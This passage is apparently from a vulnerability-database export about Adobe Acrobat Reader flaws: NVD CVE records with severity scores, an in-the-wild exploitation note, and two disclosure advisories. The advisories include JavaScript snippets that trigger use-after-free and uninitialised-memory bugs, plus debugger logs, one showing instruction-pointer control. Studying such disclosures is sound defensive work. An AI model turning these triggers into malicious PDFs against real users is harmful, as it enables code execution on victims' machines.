user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4984", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4984"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2018-4984", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4984", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4968", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4968"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2018-4968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4968", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4961", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4961"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4961", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T06:09:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-4990"], "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Double Free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:57am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-24T00:00:00", "published": "2018-07-09T00:00:00", "id": "AKB:F655D7DB-2168-466C-BE67-0F0908306BE4", "href": "https://attackerkb.com/topics/pebPc32RaZ/cve-2018-4990", "type": "attackerkb", "title": "CVE-2018-4990", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-08T07:10:05", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\r\n```\r\ntry{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\r\n```\r\n\r\nWith page heap enabled, this leads to a crash:\r\n```\r\neax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\r\neip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\r\n0:000>\r\n```\r\n\r\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\r\n\r\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\r\n```\r\n0:000> !heap -p -a eax\r\n address 292c2fd0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 292215b0: 292c2fd0 30 - 292c2000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 55a4ba1b Annots!PlugInMain+0x00207b1a\r\n 558e1e29 Annots!PlugInMain+0x0009df28\r\n 558e2308 Annots!PlugInMain+0x0009e407\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n```\r\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\r\n```\r\n0:000> ba w 4 292c2ffc\r\n0:000> dd 292c2ffc\r\n0:000> g\r\nBreakpoint 6 hit\r\neax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\r\neip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nAnnots!PlugInMain+0x205507:\r\n55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\r\n0:000> dd 292c2ffc\r\n292c2ffc 29d26fe0 ???????? ???????? ????????\r\n0:000> !heap -p -a 29d26fe0\r\n address 29d26fe0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 558e22e7 Annots!PlugInMain+0x0009e3e6\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\r\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\r\n```\r\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\r\n```\r\n(c20.5e8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\r\neip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\r\n0:000> dd ebx\r\n29d26fe0 ???????? ???????? ???????? ????????\r\n29d26ff0 ???????? ???????? ???????? ????????\r\n29d27000 ???????? ???????? ???????? ????????\r\n29d27010 ???????? ???????? ???????? ????????\r\n29d27020 ???????? ???????? ???????? ????????\r\n29d27030 ???????? ???????? ???????? ????????\r\n29d27040 ???????? ???????? ???????? ????????\r\n29d27050 ???????? ???????? ???????? ????????\r\n```\r\n\r\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\r\n\r\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability(CVE-2018-4996)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4996"], "modified": "2018-05-17T00:00:00", "id": "SSV:97293", "href": "https://www.seebug.org/vuldb/ssvid-97293", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}, {"lastseen": "2018-06-08T07:10:06", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-908: Use of Uninitialized Resource\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The method calls required to trigger this vulnerability are privileged and can only be called from trusted functions.\r\n\r\nAdobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms This give the potential attacker the ability to precisely control memory layout and poses additional attack surface.\r\n\r\nWhile executing a following piece of javascript code a specific condition leading to memory corruption can occur (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\r\n```\r\nvar a = this.Collab.drivers;\r\nthis.SetRSSMethods( ); \r\nthis.ANFancyAlertImpl(this);\r\n```\r\n\r\nUpon calling `this.ANFancyAlertImpl(this)` a memory object will be allocated. The pointer to this object is later passed to other functions without it being initialized. This leads to undefined behaviour that depends on the previous contents of the same memory region, leading to memory corruption and ultimately to arbitrary code execution.\r\n\r\nTwo pointers from the object end up being used as second two arguments in a `memcpy` call which can easily be abused to cause a heap-based buffer overflow:\r\n```\r\n(660.8f0): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nDC\\Reader\\plug_ins\\Annots.api\r\nReader DC\\Reader\\plug_ins\\Annots.api - \r\neax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0\r\neip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203\r\nMSVCR120!memcpy+0x2a:\r\n645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\r\n0:000> k\r\n # ChildEBP RetAddr \r\n00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\\dd\\vctools\\crt\\crtw32\\string\\i386\\memcpy.asm @ 188] \r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d\r\n02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1\r\n03 001ac770 776412e1 Annots!PlugInMain+0xa4c5\r\n04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0\r\n05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357\r\n06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050\r\n07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3\r\n08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219\r\n09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d\r\n0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb\r\n```\r\n\r\nStepping back a couple of function calls reveals where the `memcpy` arguments come from:\r\n```\r\n0:000> bp Annots!PluginMain+0x1bd3db b\r\nbreakpoint 0 redefined\r\n0:000> g\r\nBreakpoint 0 hit\r\neax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8\r\neip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246\r\nAnnots!PlugInMain+0x1bd3db:\r\n776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\r\n0:000> u eip-1\r\nAnnots!PlugInMain+0x1bd3da:\r\n776412db 50 push eax\r\n776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\r\n776412e1 8b4508 mov eax,dword ptr [ebp+8]\r\n776412e4 8be5 mov esp,ebp\r\n776412e6 5d pop ebp\r\n776412e7 c20400 ret 4\r\n776412ea 55 push ebp\r\n776412eb 8bec mov ebp,esp\r\n0:000> dd poi(eax)\r\n26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0\r\n26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????\r\n26a5f008 ???????? ???????? ???????? ????????\r\n26a5f018 ???????? ???????? ???????? ????????\r\n26a5f028 ???????? ???????? ???????? ????????\r\n26a5f038 ???????? ???????? ???????? ????????\r\n26a5f048 ???????? ???????? ???????? ????????\r\n26a5f058 ???????? ???????? ???????? ????????\r\n0:000> !heap -p -a poi(eax)\r\n address 26a5efe8 found in\r\n _DPH_HEAP_ROOT @ 61000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 26954750: 26a5efb8 48 - 26a5e000 2000\r\n 6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 6326ed43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\r\n 6326ee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\r\n 7748a048 Annots!PlugInMain+0x00006147\r\n 7748a00b Annots!PlugInMain+0x0000610a\r\n 7748daea Annots!PlugInMain+0x00009be9\r\n 774890a1 Annots!PlugInMain+0x000051a0\r\n 7748f546 Annots!PlugInMain+0x0000b645\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 7763d75e Annots!PlugInMain+0x001b985d\r\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\r\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\r\n 7763d6ab Annots!PlugInMain+0x001b97aa\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 7763d75e Annots!PlugInMain+0x001b985d\r\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\r\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\r\n 7763d6ab Annots!PlugInMain+0x001b97aa\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 774a4f71 Annots!PlugInMain+0x00021070\r\n 7762aaa2 Annots!PlugInMain+0x001a6ba1\r\n 7762aad8 Annots!PlugInMain+0x001a6bd7\r\n 77626588 Annots!PlugInMain+0x001a2687\r\n 7762af80 Annots!PlugInMain+0x001a707f\r\n 51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210\r\n 515d267d EScript!mozilla::HashBytes+0x0004201b\r\n 515b75b6 EScript!mozilla::HashBytes+0x00026f54\r\n 515b17c2 EScript!mozilla::HashBytes+0x00021160\r\n 515b05f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n```\r\n\r\nIn the above debugging log, we break at `Annots!PluginMain+0x1bd3db` to reveal `eax` being passed as argument to the function call points to a newly allocated and uninitialized buffer. With page heap enabled, the contents of the allocated memory will be filled with `0xc0c0c0c0`.\r\n\r\nThe code and memory layout after corruption just happen to line up in such a way to allow for easy `eip` control by simply adjusting the size and contents of environment variables:\r\n```\r\n# set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA....\r\n# cdb \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\r\nMicrosoft (R) Windows Debugger Version 10.0.15063.468 X86\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\n\r\nCommandLine: \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\r\nSymbol search path is: srv*\r\nExecutable search path is:\r\nModLoad: 013b0000 015d5000 AcroRd32.exe\r\nModLoad: 771b0000 772f2000 ntdll.dll\r\nModLoad: 75d80000 75e55000 C:\\Windows\\system32\\kernel32.dll\r\nModLoad: 75340000 7538b000 C:\\Windows\\system32\\KERNELBASE.dll\r\nModLoad: 75690000 75759000 C:\\Windows\\system32\\USER32.dll\r\nModLoad: 75400000 7544e000 C:\\Windows\\system32\\GDI32.dll\r\nModLoad: 75f50000 75f5a000 C:\\Windows\\system32\\LPK.dll\r\nModLoad: 75450000 754ed000 C:\\Windows\\system32\\USP10.dll\r\nModLoad: 758d0000 7597c000 C:\\Windows\\system32\\msvcrt.dll\r\nModLoad: 75f60000 76001000 C:\\Windows\\system32\\ADVAPI32.dll\r\nModLoad: 761b0000 761c9000 C:\\Windows\\SYSTEM32\\sechost.dll\r\nModLoad: 75550000 755f2000 C:\\Windows\\system32\\RPCRT4.dll\r\nModLoad: 75a40000 75a97000 C:\\Windows\\system32\\SHLWAPI.dll\r\n(8b0.3f8): Break instruction exception - code 80000003 (first chance)\r\neax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000\r\neip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nntdll!LdrpDoDebuggerBreak+0x2c:\r\n772505d9 cc int 3\r\n0:000> g\r\nModLoad: 75e60000 75e7f000 C:\\Windows\\system32\\IMM32.DLL\r\nModLoad: 753f0000 753f6000 C:\\Windows\\system32\\NSI.dll\r\n(8b0.3f8): C++ EH exception - code e06d7363 (first chance)\r\nModLoad: 74f60000 74fac000 C:\\Windows\\system32\\apphelp.dll\r\nModLoad: 64a70000 64ac1000 c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\sqlite.dll\r\n(8b0.3f8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8\r\neip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206\r\n41414141 ?? ???\r\n```\r\n\r\n### Crash Information\r\nCrash output with PageHeap enabled:\r\n```\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api -\r\neax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000\r\neip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nMSVCR120!memcpy+0x2a:\r\n6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\r\n0:000> k\r\nChildEBP RetAddr\r\n0016c6f4 7748e62e MSVCR120!memcpy+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n0016c71c 7748e5a2 Annots!PlugInMain+0xa72d\r\n0016c744 7748e3c6 Annots!PlugInMain+0xa6a1\r\n0016c754 776412e1 Annots!PlugInMain+0xa4c5\r\n0016c764 774f7258 Annots!PlugInMain+0x1bd3e0\r\n*** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api -\r\n0016c790 515bd6b2 Annots!PlugInMain+0x73357\r\n0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050\r\n0016c830 5159387b EScript!mozilla::HashBytes+0x315d3\r\n0016c8c0 515932df EScript!mozilla::HashBytes+0x3219\r\n0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d\r\n0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb\r\n0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e\r\n0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc\r\n0016c990 515db61f EScript!mozilla::HashBytes+0x31373\r\n0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd\r\n0016c9fc 